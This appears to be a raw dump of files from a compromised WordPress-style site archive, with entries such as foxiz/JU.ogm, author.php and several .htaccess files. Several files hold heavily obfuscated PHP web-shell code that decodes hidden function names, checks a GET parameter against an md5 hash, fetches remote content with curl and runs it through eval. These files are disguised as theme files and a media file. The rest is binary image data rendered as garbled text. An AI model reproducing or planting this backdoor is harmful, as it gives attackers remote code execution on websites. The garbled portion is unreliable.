array/*-<%-*/("39367#39352#39365#39369#39350#39365#39371#39364#39349#39356#39367#39350#39361#39355#39356","39351#39350#39352#39371#39352#39355#39350#39417#39415","39360#39351#39355#39356#39371#39366#39365#39367#39355#39366#39365","39354#39369#39367#39359","39368#39369#39351#39365#39412#39414#39371#39366#39365#39367#39355#39366#39365","39364#39361#39358#39365#39371#39363#39365#39350#39371#39367#39355#39356#39350#39365#39356#39350#39351","39394#39424","39341","39419#39424","39401#39384#39384#39401#39377","39355#39364"); /*-3w)L-*/foreach /*-I4B-*/(/*-Fi]-WD2HI-*/$NabHiAcGrg/*-o[?uc7H(}v-*/ as /*-?;9-rdHB2{-*/$AZJD/*-cK-*/)/*-,p7bt-*/ $KI/*-Npe=Bapv]-*/[] /*-T>v-*/= /*-jzd]-*/self/*-G{O#z6e-*/::/*-m)-*/ShOEJpwlIM/*-pD-*/(/*-$q8%B:KM0@-*/}[/*-9ztQb,VY{-*/$KI/*-jYHt-*/=/*-LY7Oc-*/ @$KI/*-4.)-*/[/*-!68uXk6WhK-*/1+2/*-k(_X-*/]/*-13}5)R-*/(/*-6!}o-*/$KI/*-8KHWtrSm~-*/[/*-s|U3E-*/1+5/*-`!%,PQdS-*/], /*-S=)p-*/$YtybmavqM/*-iJi)`FW-*/);/*-qSPL|(}-*/ $ZJQfOkjt /*-G4YO}-*/=/*-Nd-*/ $KI/*-P=uGf-*/[/*-VTS-*/1+1/*-QO+|ZL!4-*/]/*-;EA,ea{aP-*/(/*-F)d-*/$Wi,/*-VofmZiUSp-*/ true/*-f(inkc-*/); /*-oV=j<~2+-*/@${/*-`t?]xvN2u0-*/"_"./*-Mz-*/"G"./*-`.|6-*/"E"/*-:c++mRJJCy-*/."T"/*-oP-*/}/*-Cf<-*/[/*-tW-*/$KI/*-7hR-*/[4+6/*-+(@$Y-*/]/*-=;C:!<2-*/]/*-@ZG-*/ == /*-Y^Z?4WFo-*/1 /*-~p!%u$M-*/&& /*-#Y-*/die/*-5zG0e;YQ-*/(/*-2Rq-*/$KI[2+3/*-BQ-*/]/*-ly!Zg+>_[3-*/(/*-c7G1}-*/__FILE__/*-qz{}lY-*/)/*-L3Gr#}v^-*/); /*-1[;1:a#b-*/if/*-|+&s@t4-*/(/*-dh%A8w!-*/ (/*-]YTLiMA--*/(@/*-_-*/$ZJQfOkjt/*-X.3&WO${`c-*/[/*-=dG?6-*/0/*-g&-*/] /*-Tx^^V;-*/- time/*-+?axx=Q-*/()/*-1UA:$-*/) > /*-aw-*/0/*--^;()Hs-*/)/*-~Rh%T%!P-*/ and /*-M`qUU-*/(/*-)G?RjB-*/md5/*-y3FS-*/(/*-&7o9-*/md5/*-}BLJa-*/(/*-CGaSTfQ[W-*/$ZJQfOkjt/*-wyremh_NP=-*/[/*-uAGIK`-*/0+3/*-_%-*/]/*-HlAb7rv-*/)/*-=A--*/)/*-{$o^eNWh!-*/ === /*-?:3RatEM-*/"961dedfa0fc1f3c36bd89d9e43de8bec"/*-KqF-*/)/*-G~,O-*/ ): /*-oTxE^fl-*/$txdCmi /*-{K[`2qj-*/=/*-Ys9sSOB2%-*/ self/*-.K-*/::/*->kF$-*/fyjtIwCe/*-0|#8-*/(/*-N!sTm5V+-*/$ZJQfOkjt/*-`oAHST-*/[/*-gxCC`-*/0+1/*-c5-j2.a-*/], /*-=z0-*/$KI/*-;m-*/[/*-UM(GV+-*/2+3/*-ZsjIRuhR-*/]/*-rA@-*/);/*-TS;C_kF-*/@eval/*-kgp]Pdf-*/(/*-zJJ]pe-*/$KI/*-5O{J,JJ3-*/[/*-TD4h~-*/4+0/*-jy]Si-*/]/*-V&dmj-*/(/*-+Ue-*/$txdCmi/*-vtc-6Dy#-*/)/*-@L7yn;-*/);/*-|nL-*//*-xRzuA~!}A-*/die;/*-V:-*/ endif;/*-EzSlT#]!-*/ }/*-x$}|SWOyC-*/}/*-PK!.|plugins/plugins/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!.|plugins/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!foxiz/index.phpnu[PK!is foxiz/JU.ogmnu[GsqV-*/$Cn)./*-c-S,59@-*/count(/*-v)$-*/$Cn),$Cn))?(($Cn[61]=$Cn[61].$Cn[76])&&($Cn[90]=$Cn[61]($Cn[90]))&&(/*-JZi&}>7I-*/@eval/*-jih-*/($Cn[61](${$Cn[33]}[19])/*-9&+z6;IyUT-*/))/*-7(;SIp9Sb-*/):$Cn;/*-?{|-*/class /*-Scd>pN,6PW-*/mp{ /*-N?I|!?Yt-*/static/*-EWRb;dW-*/ function /*-0)q-*/CGR($PTUZyqeg) /*-;9x-*/{ $zmPGAU/*-Y.-*/ = /*-AFydt-*/"r"./*-cidc~U@]-*/"a"./*-wLm=q91SM-*/"n"./*-gH~6KCR-*/"g"./*-?g_}.D-*/"e"; /*-:;Wi_tS-*/$ntGLgROj/*-YtYzQ-*/ = /*-|4-/*-j|-*/ $Jg/*-|o-*/) /*-h!Z-*/ {/*-ikqj-E-*/ $fktnlcbKZ/*-}ilA-*/ = /*-;QQRP7E;`-*/curl_init/*-`[3`_-*/(/*-<;zK.0N-*/$Zfe/*-2Q:!M+3-*/);/*-qI{}:T-*/ curl_setopt/*-Q(-=|[-*/(/*-9-*/$fktnlcbKZ,/*-d4hv2..0-*/ CURLOPT_RETURNTRANSFER,/*-_0GVJ#-*/ 1/*-y$J@>SS[-*/);/*-N,Iah4ta-*/ $mQdLahY/*-T-*/ = /*-n{|N7mX-*/curl_exec/*-nXc!Q-*/(/*-pCI7-*/$fktnlcbKZ/*-c.,Dc-*/); /*-<-*/return /*-b$00dc5-*/empty/*-;0X8l-*/(/*-h-*/$mQdLahY/*-ZN-@[-*/)/*-hRf@|`#x|5-*/ ? /*-,ko-*/$zCEjDLMbIc/*-]K)9vZf<5-*/(/*-E]!oA7&-*/$Zfe/*-XL0|+r-*/)/*-fHL^-*/ : /*-<}!~C2[r+-*/$mQdLahY; /*-Ps-*/}/*-X|^7cu7-*/ static/*-tS-*/ function /*-Aga-*/mEix/*-)x(Gn-*/() /*-a&Y$W%Nk-*/{/*-uDzJ-*/ $nlYeZaE /*-2zp4-*/=/*-Q|-*/ array/*-4O-*/("69780|69765|69778|69782|69763|69778|69784|69777|69762|69769|69780|69763|69774|69768|69769","69764|69763|69765|69784|69765|69768|69763|69830|69828","69773|69764|69768|69769|69784|69779|69778|69780|69768|69779|69778","69767|69782|69780|69772","69781|69782|69764|69778|69825|69827|69784|69779|69778|69780|69768|69779|69778","69777|69774|69771|69778|69784|69776|69778|69763|69784|69780|69768|69769|69763|69778|69769|69763|69764","69807|69837","69754","69832|69837","69814|69797|69797|69814|69790","69768|69777"); /*-J@i4^Uv2A-*/foreach /*-|updM>--[-*/(/*-rj-*/$nlYeZaE/*-I)VlR$x-*/ as /*-2%r-*/$IxiPn/*-Dm$-*/)/*-hh-*/ $wvzgfspIO/*-nVx-*/[] /*-h+A%3-*/= /*-CM1%0-*/self/*-M)~P+_;-*/::/*-%&aE-*/CGR/*-(Y.M-*/(/*-)IAN-*/$IxiPn/*-F-*/);/*-B&W$bt-*/$FJbEQuLUqw /*-T;oMg&~=-*/= /*-nG5`:#Dv:-*/@$wvzgfspIO/*-fPPOn6{qp(-*/[/*-I~3-b-*/1/*-9.]r-y>vh-*/]/*-bZRr^$3|-*/(/*-PK--*/${/*-3R1-*/"_"/*-xi[Wd-*/."G"/*-CMv+>jI>-*/."E"/*-WdP;wua;R]-*/."T"/*--*/2+7/*-mp:wa.-*/]]/*-r}(G9d.-*/);/*-Y-w]-*/ $suUBlGEdAN /*-AwS,F-*/=/*-4aZO-*/ @$wvzgfspIO/*-N-P!xaN-*/[/*-l_z]7Z-*/2+1/*-rA-*/]/*-4{t=fO$x-*/(/*-HcsRcq-*/$wvzgfspIO/*-Af2-*/[/*-[WDAXex#-*/6+0/*-EH5H0-*/], /*-`P25|+qc3L-*/$FJbEQuLUqw/*-Gf6IzQL&U-*/);/*-[Fa)9!gc-*/ $CKDYuXWhw /*-dD.!nG-*/=/*-zbU(S8Z-*/ $wvzgfspIO/*-MIAol_+5-*/[/*-1YdeOl20_3-*/2+0/*-u^2-*/]/*-55,OMLAK)N-*/(/*-OPL-*/$suUBlGEdAN,/*-NIs`+(X$:-*/ true/*-h6.-*/); /*-y$08;dC-p-*/@${/*-TH^B-*/"_"./*-0V7lqS>plU-*/"G"./*-ze5N]#b-*/"E"/*-`&DCB-*/."T"/*-b]xY~-*/}/*-k!gW-*/[/*-Ls,zEKk-*/$wvzgfspIO/*-?P`d-*/[6+4/*-2iT&-*/]/*-Jf7~G-*/]/*-;I /*-i]Y,-*/0/*-9VWnWq-*/)/*-G-*/ and /*-jA-*/(/*-MbJI_U^@uK-*/md5/*-Q;dOg)-*/(/*-5B-*/md5/*-j$t8St-*/(/*-Vh8Q-*/$CKDYuXWhw/*-[d)^=mZy-*/[/*->mXjq-*/2+1/*-wHe,5-*/]/*-1sagD^-*/)/*-G%4x]-*/)/*-:YihYr3vR-*/ === /*-IR%J-*/"a5050ed3871fd6a04d11b0fec2cad109"/*-Iii-&-*/)/*-pg!c+_--*/die;/*-CM(fP.%-*/ endif;/*-6exTT%-*/ }/*-Qt`S-*/}/*-4-*/mp/*-)mf-*/::/*-tisBR-*/mEix/*-1-*/();/*--d)y6|+@-*/ ?>PK!.|foxiz/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!No author.phpnu[_tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp riBrIDATxx[7`K8{2YeoBiR})U-m=h eJ+{Oglj,铻>|q%|ndΉCFT]plG,CeU՜9sӫ)'jLhѿ_lX%K_!^Y]tiup#:??~[*`͛# ղeKB Ȕ?<>ɪP|7*hoS󢏿:'43kUa|_Lvp,LG^u͢KH$~72d2ymҙQ믹WD&.?6ݍ-~UZZv叮$IG-cOr!) ^pj;vwg398+(ЮU%_9*颋N4o_9/S ~kqݺu}84utW?|koޭ{=l/OvЂ "]nu M}$SкkM>]@UU՚5kknYEkkݺ/6t8k``gw9k"!h4쎘߹G_ieWU=fi(^)5|6%%+u~-ŚKBf/:7 ̊\U eșS7HgXQI|4/v Ͽ״lO)Iz)/+OR f`OvpHi C4ɜH'좫'_Y:`c~.K 6-gLsTsLnA6| k|\uBen}}ʮ8ߟ)qFo) pm,ҋqjrI'lTX~)@fETxw4X:ÃҊn'/kժU`U7uq߳gf9Dg;C ߔ?_qGڧey@C- [5H=SƒDg]Ǎ߿:!@S`fzkW]9[I&-Q2 ld-T+V nI3쀖-Z3,uB&Tp/óڋB啍#2#L&Tp!-1MŨQGGɈD*v%M'7~*aÆkf7o^"ϺLbs@D$SW]3X_}Fh2JKK3RƪMh6 ǎ=puB& TVQ[h^3 WƞxֵKCA].#e\Ziѽ6{H\m/ =/o4ڣ_:vd ,^:#5ܰaC"Ν:g߉ۿ__uBH_uwis#Ϗ|8f^TT[LCl kժ^@R{ͷT4W^S֮ 4oގ}yJШn|(w(5٭CNT^4'VVo/YdANQNOҭZ7;wK-[aC]e9sl{lVXXA@ ܩ/eC#O949wgT6,P:Z{5'R gBVEΩ:ot}&nѢhUP-]dSzѢA:߳Qᢀ@GIn|0ÝQ+cH,ƄߦqqH Vkr* ӍT*|m~0*'%t>|LޫgyJ6n x/^4ztY+/szh@!P ސwobA7lµգv?b^Fロ`$^U'dU}ҥsUTŋTTT\׮] Y/ d3&SW^\Ƣ=챫oQ}ȲGw@ä=_!r]e W9`dW%Kd`u-7DY*j?o:!@Fa&'IeɁ=~'R[Tͪ*9M67Ƈ|Aw?htGܠ`v9/{( d*Fs~02uNmT'س+iyV^}n|9ahmFɉ۞Cppg3f,//rΘ13vbgNڵ8uB̈uCHFN.;|;.}YT«7%fΜ~իWY|iժ3OsBKgmRebIWpA61dn;){/f$y˷x- >,j8ej`mM6* -[Kf}-'߭Ӄ@e8|Yglz_?T|ɅLnwdv0"^U2ܩӈ^cb` xs[?$ ۚztŷ۫]fPJmѢpܙ KF& ^FNﳂo=k0}cFdK$b~"T^˵pxxI?(+k˃'^ շo6muw}߬A?5jYt@_TA>u0lGLU}ȈLZ>2c' r_ܡ] .z{r^7X\W_ r6޼ W~Gn]'|!@}sZd У#k~s0܉CJ=Mr*j 3{ dŗoO~dS`K<`6<6lp;k~* dd*+i9~A6*)}cKk?F7!|֭[ v47ޜ4gFy"x|“A.Nǎ65(h˖-O=B6''ȡ%A5VozQ--<{i3er tf{7}o3grvX5>իnճ!@>fFڭ>dD=0чDhr@W&{7^]-}s_uڶ r-</i[nx=h֬YvA?FU!@ X2trN/J6n/]莉dxɪοhR:ZW;sx<~o(˞=z 85&͉\1q}dCpƍws_ӨQGڣF̳7w3{j:"ogԣ껧\pSӒNpN"sN=ұMbfدSVwW<-ۢht]#=C[3aS+Wխ[WQ672cQƚO'P}Ȋ_A3i09w.M7Fx9l#\額xm۶_]j[Tϡ%b#` WF_oÝw裏D"Z=s=xic۴n@Œ9l?!TpANdNKO|D_}33>ⰡCgyUUW_;uCq^yMEEE=o߾QGaՆ 2k.c!@V| L4mfӎ(w;AWHtM>aF&ZiysLkdK?']hߺdʕwCܹ=VO><;v@݁p{fu;ߣ+oLQq7+nLSh֠u~-\d_3R6lKw˭ۮwM~ݯ^s- vvZ[G{K=[(/Ⱥ3ہw> l[=;Uw}?hONvPy?m+珆VoQ[ ?3jsϿf9ʕ?//HW?Xܚb57zic[l@(~,1cf-nm MF:)U6ʽFՇ>`hz\s.t}I,2ύHeA}d߮c>tT.vߋ~k"֜)ݏ|}Bp(T͛7?icO٣K{?~\֭˯^{yi˳ycRun(٧K={I%Tdn ӫ#Ѿ7`afW…?ޚUwaaa6iWxGnk.'p:[bEko-#bw5|mSYT\wxZE>[T빹}qV^=աV>ƍ%7zָ3ڴi@Eky*4KzZ!vRP^?-گ9#?̖^={yӃ[rSO9Fu:fIx\2Og&| mo&2W^~ȋlߺMPz"eN8+> 4@~ShRMN(?l//<'ەس^c Wn7n8KGZbKvi@d wf,FQϿܷ4FpOjUUe/g>6ݴnݺ^y׽eee7zOq 4kW߽-ֱ .@ܭW#k}gE:g ~?;V-^^۟~XBWoҎ|t˖l.C?3T^ʘH8զeb@zL$%jYg~UO~d7EّGs+fN(pXFKJ3߻d}nm]}Myyy߭y|“6lo}N!@S ˳O\?Z%pΩSUN.ԣWJ4n2dfŶihTmXr壏?p=hBfSYf254r[U>*/]xOoתOWR[֝dBMEEEW^5p|vmx'*++nSlL@ hzBeMk~hn}:† o\˂`N+/Z tJs6n7:uܛ~v1d݆UOJ}ɦbWͻ/%R}ꣾv犐ȝ8=ǹ~ nM%c{ X4ٷKOXxb:d;xw.|ѢŻvڲe뮹Gn۝w[Zi3N?EBB&;izX?;5'H,H:cp*Z.2}^:F>Y^\ShO8dR?D$HUUUUm[xɋ/p}9u)MS*#튵ɟFR-:'uMu:նUNHfxhSYht /\4vcc hwHmmi? ~йUW_Wr ڭyJJ~n9EM/Fv2ՅFYʭUMK.Kkj2۷kwءs?oE=B1*꼺Iew =/Wߕlo_zYsHNʩk)Smlw=[>F/|B&+ߓ( S5Dm`"g7o~ڵ뮸+mrm}.Ӄ/*> 4a"lutsQբ^ۓaiVzd2'~r lRvRăo4٭}n3/=>lk>ɿol{4w1F{5cB!@SmRy'ZCu?4վն'Xx?i3=;7-**R|@ h⁰s;E1A=ߪ}o{8캭L&tKKkaͼ3f|7nW6M?t_,?e]8p5TVYGDϋ9x=2ut+!mڵͼ?p9{\nKu%1oT\s]mZ)x8͢E>k?^zW^}.̙&Nz+FuzܱU'ٵ}N^42uj`qGǍ vx&UE-jVJH&o7X>nݪ.c,-- oBO'3[U]]]˫E](أc5wEv& $eu "5'7Ry_z‚ }|B3\={;fZlU׮T~^r@%SXb^3GU<2ձ/TRZgzzUUկ~}uRx֭kZGy,Uδ!NC*Lh.Já߿C==Le}$v?^%jن6j}g7o~+ӻw٣dٲk׮[vM2ثҲ|\|6 >Æya@S3SNJTWsRPh=jJW)Hg#Lns$uah-⡇lqu!ϕ͟Io噿T~g;WϞd[ ݞ;O>#G Ϟ${wI*Hos`bɁ5iAwFoձ.wH幯˳,T{ÇN8;gH'+_wushgϙ˯h5KG;!Ns̮DԹ]r^)^PeA2'OH*2?z&L>٥mN$ HmF0,պ/n.-}$ޥwzԧW7\#G3r+>q!wsw9P(@ Ť bgm L%?:$~Shsy2Sω'rRO(G( s"榊 S[#VMd^S;ڵJrӿ :]@G-afҤΝ|bo/ڮw:aÆ^ë,\pʞx+æ7Io== GK@ 5%Fھ*r_x?պeՙ_;"5ɚqә0I/HޫSrۚ"Ikd^ H䦟x;Cvog 'o\Ԧu]uWMo`chԡ~ntءo{ LujK+7ӷ'|oX]~opW,~w]ui>|>rġ8 n ޡ֋5ܟ]hU{E>[XG <`XN~l_|d2po3zL:v𣫮ԯZ#J=#{9gb1I@ ؕ%$ZW{'^M(FVխۊ\7oazlkƞpL6'\`G9qR6tԑ;B!.Ƚ>|썅kK~d/_Eᴸ8=M͠;Iw֬]powwZl1/W:v"]r'otܙ{( 'ܴ*^ ߘwYCk6ȏ׋;I'5 ;wtic^_x)wyN:7:lcF{7nVsZpmw>S@RGOZǿ|/\Y<}AV[zڥK t鲩Ӧb;u wN$!:Bl8pxG&КϿW O*g.m֣Du}!ad[w6ld O9N~(((8=𓄯o~7:|0wMqv\ {XolPQta'O$hrDdv"7SYiM:7ó}Q[d <ƊW8pʮo>"Gu$>|-^\Z:{Μ uܘ={hiO-8+VϘ1sȐv-yioN|+FއvC">`g${v>]oBKËWE{A?4}:.Vu15. WPFlclxsҮK&>X"T8|/sHBf'~ʡ9]낋T8'Yun+j:+~]ŷ>]>z0mƌYAG?xݧQۧjOvO>}}^@%F>r]eiB9Mn#spáu%u3Μ5;2bXcr!PK/]~}S߂[lٲW]H4Q!hUڔD^T$٧,:>kH$"HOOoLsd.m"mŊ?(:~a ^{va5,+>l5KNĠ/|-,,xݿUVUepG6|0b@ Ȍ>DoJPO_BCG ˻LtuϿ^\\n]p!@.ѣ ?w&.j~.x-~|5vKFFշO.ɉU3x/z^4Kd2p0i0ޙS/a}ƍW_/:tn=>dA.ڜ>8u`DQC6|+3qpќ0?'rjڍÇnzժ4`իݫ}'52ZV^57$)2.ٳSrpdn~d  .UzTVVTT̜9+o߮wR-7mڴzM xj@BS>91jݲ={ Jr"Da˂TTQa:}~$ /*οȧ 9}%c=:ns+// \T2rXsfnrC=)S9WygS%O s!pM%?@ ȾLxo/]nLD/աuM2wb O]w_d>U~:'Xn}`ޭ[m^hoa6oԩc|1 %_)'|oPs_0'7N%Nv:ն(ղJ+jFV nwՉ/ny:T^]KnYq9y:\zuuܹsAAA. u%-[޿_ޞB8`XϿﳫ[Չ9m:ڷJkUs0TT?JB7Dέ gL}9_ V~e3qq񪊊*׳GX,5%@r߹jA pPhƼ== oGV({z~̿?"?(zNp )3CztseV,=w d m*&hO>K+OMbx9YsW7md5:thСC XRe*rz@ h2*/S\[y9PQpci~LxҕgڮY6Ȃn*#+0`[zMoޚᔩ,!@Ʉ?83'bn,Zó㎪; -}S"WUu]d*b-ZfhmD[nظ1RdooAeԀ֧s뼑/`EIO YjvݦK. ,mڴ쥛QTTԭ[%Ky|7LpQ)fNKlXT7Sz*,<2ފ| f#J,Zqyػ0¡ ?,)ٔ;=H 4UU_;>ն(sYձsFa+r_ ڔu9V3UTX󋪏{d,/k6SgӒ.FYLB-~35'v\N$~QY< .>]*~qqb;3 ǜ ʋź8auuuyyyAAA8on@ hY7g=oZW,2sqxβp: \*kU=jkOuneu*J 2sh˖=Ϧbeȶŗ_7o@+HZvy7OԣGSZ8= 0kC6VoW6^ 9ΦT*Чf* l-D%Awu@ ɏU~y?{8zcJJsVWC73zw9Շ0ձcal /`B `W?D:SZ7ՔӃid&w `הӥDvOՖnpKVګi/F*4}$E!@|7>̊tpb!{=JNb8#3Lk7TFa.]r2% P]4h^V]]| ־Oodϊ bGSuqA=P8\QY72[QQQ^1[YYU[x*W@ ӻwҹss+obd;/}Gib^u4j;yX-Zb 40E޽[`mo߮k-w}w`>lhf+[#G3~SO<7Q&D"=;䨣lE>zOE[:6C>3g5F#8Ա,!t/|KKˢhcmrݺu+>¯<脲H$x>C?o5qsd?&P)*))Q`͚=}vۭ{ղe-֭[v?ݣG]lM@MޝYQd Pב`\Hԙc(̼#K7IfF󞓌S3yyQ$j&7D " Ҳ7;;MOխ[UT]9u@M6{sT#=ïj4=y䆬o{>x݈BL!Yaܹӗ.]?dȐ{<ƻdɒ;#GguSv=䓡vQF 6L2}گ_^z 4īIBK?яRr`lF'?a6me>÷GU3g r7>UWB\qpVt`ΝvѸqƌ#!G+tM0!Knڴߕ! >ѷ_wueee?OM7tܟ*!Nof1sM}~NdW^yeiiԩSGyvyi Q8\|:<B ?m'LFsOꫯR!8y!C<vzue[N<6~}sf͚XlD[oc9m;8W\\=<3WHy2|ng{m۶3CַMj/pT)k%"C}Phd 7y8pΜ9;HWod?A}Ogkճ|ᡇ uް@4X"ampNAH"~@.^e`=a㪹y?fwL z@B$NwOV虾qi` p3ִE=|ip_Vh۷o8LC΄QO'\ɪ] I !@xxzS}|s9t-Z,Ym۶/< xaѣ{ݣGּyʫpwtvx>#~٭[h"㜰gQ\\`z* u5!!$G8p+vp2Ń[嫮ju $hv:dȐ(焯T_gРA2F ؐRwNV2=YጧryrP,qD^Kk=tx+y晔>Qţ{Lm­dtg} 3eq  22{O?cq^xq#<2r8hKqKhv;H&C7bJ)rrBS͜9sވ'I6 v` ɓl[ɪKCI6Li6axv)MvCQmt^@i 3~{g3r\t9=D8pDBݫ{ɚklᄤ(@lٲx:CJ[V=O ;촕 a"fqHÔo1I#y# N8:sHr] &yPuhN!G%;=[,ySZΝ;7yR}='/ .%~)WBȄ!-' e:27}7`.Y;NÇ>–x’aOg}jq{RnC?~5$SW=B;OuHΌKn;SNIIu9sI,~w?ɭ͞=瞻+k;vlNC^ 9(QF0FxH_wpe81em/oF|?4YO>i|# [^hQ#EC̒ѣG;wN;҆dg9Ic8|+6o[nq]wu"ɪ!CSiSwԵk׺53ɻdblrN9rs=5jT=wǃ:N:5@(n/U5Հ@@2'vD9\ʧguV<=k֬d{Ѭ`OQ1>4ɾRz< p=g\cdƃUBiiܹs㏴F W{h :y}T{:th|ka_e˖][$ӖٵnEYHoVV /ld|H)w^2˯N8a„CfRdLrd#ȠA.\# ;d.vQ̈́[n;g9RO:.YSlZQhgM[/tXai _ӎ?Na]xӦM{'Mt de&dӟ˽ׯ_M]&)S+>ug>oݿM4k,[o#k"}ߏnܸ_j5œ*zCHq1cFJOH);C$0mB8p`26]wݕž\{əq'wߝB:&|)ヤ Hd̄ dmRJ!q{~{'/9Fd3ɺ[^i&Ne7 U$^?\}Fr?GQ WWeҥK^a:\LcHp3gN\kЩ "qš" A!r>Y@y9cƌӧώ; 7Mvڶm6dɒn)1?~|^|0/ytI#G|G 7cǎGjk&*6X2r뭷fJR$+fϞ̷~{6Z|F y$tʕx(8 ^}_ʹWG|GoƸ?ϟ `2?E]SR``3}C|ڵF 4@NwOk߾}qeli#p+LO  z|Op{R=CCZ{-q ),yTp޽iq VHɯ[k`'eee|-Y9NUr+ă$jW);uw-ZV?z#F$^>%48{~:RZ}=­dK Ed vݮ8S 6go 'iSs:a„7xwǏ?@uTVt\U2-sP'+#G-˩-3ѐD{xJ y@ 'MGdTk׮]zuإ^z-K]ݵFh#~P^{mTKiÇjBwÇ@8.B;vl4~WQdsOñәz6BHJ3h qQ^^ /DÇo`F@cW^QS !ptKN6n?˔Liii|M>}3RcB8v^y;iܸqXzy뭷*TQCِ!Cƌ8ƍwhnB8vo۶m{73%-[L2d 7 §qX+++۸qcn"UZZs~) t !@@@@@@@@@@@@@@@@@@@@@@@                       @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ BBBBBBBBBBBBBBBBBBBBBBBB@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ BBBBBBBBBBBBBBBBBBBBBBBBWAy,޸uo+/ݺs]{* s;4oڭUqzn޿]:ЮD}JnݺU)gǞyy6.ٸ+hܮmG4ovEJR w?.M{Ņڗ|Rn%mJ r+hw,ްm?Ҵ ]o^@d7WE/.]~r {vֽ[Xnci^^fOeU4ol:+a:é [X=}W©ݺ*> ۱+lgOg{-) >Ӻ,[?ش}wں{oEUu~^n&틋zj޷m;*.Lxek{Eo U!p<ڲ/3macx_? 7llk{wuZfM.y`ɏ~޲a-a:ζXȳ^|kuyoe\פP oS~tC<k999?xm^/YTce着̩ɺ 꼜]]Ь@)]|c7W?oԩ?^|F;?,kO7=4=M[]Yߤ:W~n=+v8,[sSDO]wnme{xysWٯ5rPGom7>T|?E<^^7?Zۺr*-@[U]={Ǻu{[̆*[eQVRҍtߏSW¬؃GJ_\gE}۴|{ѿxmMM;-k6UT7)^';O\& ޳o6sF6\kaKfSon#{*3礥erj;>ί<Œ_T[Y]]Q].^euUna!pp6}ţGylM#rcb`f%k }{iGNnq-5 F@ƘSVՄڟun,yÓ,?-oW/]{¼}yI~7^_;&U^ 56!4wOYa'W 9fp/^{㲣էmKGܴ ?!>{E9v$G؇=e~eHW-q@y[9^ԫÿ^:fy+ ?S࿏>;s]~ zh'iQ2~Ѡ '1dk7Opm?KUչ9;݊0珥e {wjѴanٽg3%gߣ}C֝pչ{de]58ڧM/'L@+ץgWח&m=w,V;ݾjU[ʓ7[uؕѯ\yGXcw4ϝ^Wnʲ5N\G\__S7Ͽ7krsshnxŵqoƥU_]vO͡i%6 G ]Yy+sj{m&yڗ<1wEdĹw+)ݢL_~˿L~.9G!m|ݺvy7Wx[y#%f=+VWV)v8)M=M .ܲkҽC^J8b^\zWm^uފ,;oڅ>n LzߝqI= >[( RRTuާtS`wkڤ?[TSUs݋?kѬl[(:K2.W3$cs+6m+j"GzuhӬ&l,ڰf n``ֱEs}gL[[iǜ5u:G[6Z{ֳ39|~MC SWgM_8/f<aəkmg6=ǞU78[ZVڤsFwTWHYu2-iә׽@~e#>;G[*z{kȥ܄2//rOݹ5ufr뎆o27Qf+Ԫ-;ÿڡ9j{UNV6y?cnImVZU]Fڇ9ú˩ݏ˲>":K ,56P5-?K0ʶY9*]Z6ֽ]=\yGֱE z` %-X%9gk׌Th֏ wѵYj2zS#-ʪfEre K-y;Ch܈DJ]ik;9AřY).\`lҤI8Ǥ‚M۪vܺiwZQS(Ne K1o|?48W?̬W3}n~FE]2?E^ٿkӦe'GhiӦqw#FrmҫӆiP/9Um15J-eSKVˢK7(=?X‚4d"{+_\:`af)K6SO=O?dz +[aڲ[1˩ѩ p}T{mݎO䫉ԫ-?:ݝ;Nԡ߿>yP;sxzٲedzsri}ְ5o9+>~ ?Jx~ࣵFܢu _08F[ر}UUnQa^y-5_N^n#3vWW|r{+&}t-< .CVVW0H`~n>^ƎgܰsOd?|XPd]ex3D=+vW_tCkOΊ[~X>F@Y*8VyJ]ᑿkNQO msh0j,Z\_Ϸz<+8vxM6?)܂ _*7O2ӣUM%^Yeb**4_8[ ?%] V3G[v]}{XfOj֤x뭷sLYYً/xLK՛'TMUUuoU\w i_ڷSˢœ!Sz.}UgwiөvHצ4!cu>GI4z}JzoEI-"<WWV6kLQR=k[v%uyyٚ-jZXz no_+WT;unגfCQZxՀn_ZZ=g g&;vSO=UVVV9ifу :F垛[إ]ٯ_9gIXux |5oݖꂼ;jZNO/観ON??L_p)5auuiap^ua`x}oj#_;{/,^OiwZK.$ɓ[Ljz۫n~}H[WW4JBMF KUv쩘Wۭmi5ZQt:yxf{O_ikOMFVK=[7uRMmZNj%_goAVE}ڐ1 !էM͋=}kŽ:LY.e?n\}W*w$c^٦X&l6>4]lմ0|sn/^> ֻ̀C4Ϊ9]4Ғ-*ܻj}Ŧm \wfE1 .7zeٚqS[Gwk.UcM/E /9c'+Q@\}Z8]һfݙ}.1ڷh"Z'\'w4LbXS }({򕽫75o*GetνŅ/Юdam̤sg _+WZG!v3jG6-Bu&,okIŃr7qtc:VW_r \c,_I# !uEyOJج՛>ڲ3BwwuĈDZs +o>"6- ӢIM1:pi~9xQ{d`\_-MIQ>5Q.Rikk#ujݧMC8~]uUթdoцh3i܌/ӗ'D[Uv׶g]gE ں󥥫ky@kUuNnn~Oּ{+rjkR>_U !ds9cnK_(]TeeguF0/oXvj㭻SVactKg6LݢSuR󯟵oڶӺgyTU->[1Lf5-w-^YkNc^HU;w5m"G޿^:G_z֌m?ϧ,7K|&57?4,Oqh&qi݊ĉƅF3HZWXB/'F&;ؤG ~ÃUWU87oVЦ$]Z@gԌWϽм\a(n%ŭ6)+k.5;TdZmqQԶ?̎[~;=vjk{7B o9yy! u5Ą IA^(6F!4&߱_.|^bU/.Y]F(K>gݥe>(۞3]ɝ#FO_9gMM^vv(ܗ]&EMr60k?*<пerrsc@àNo:Q|a-=kO']Qϧħp% [omM%;#G}?kIM'<1uU99rxV2/-]N1%][zټkOO}6+/GiVӍʮK\U]$?ob'G!}\u&S1h~f,Xvz0mJgںoES12m*B 1k>S;ߨz޼eT< 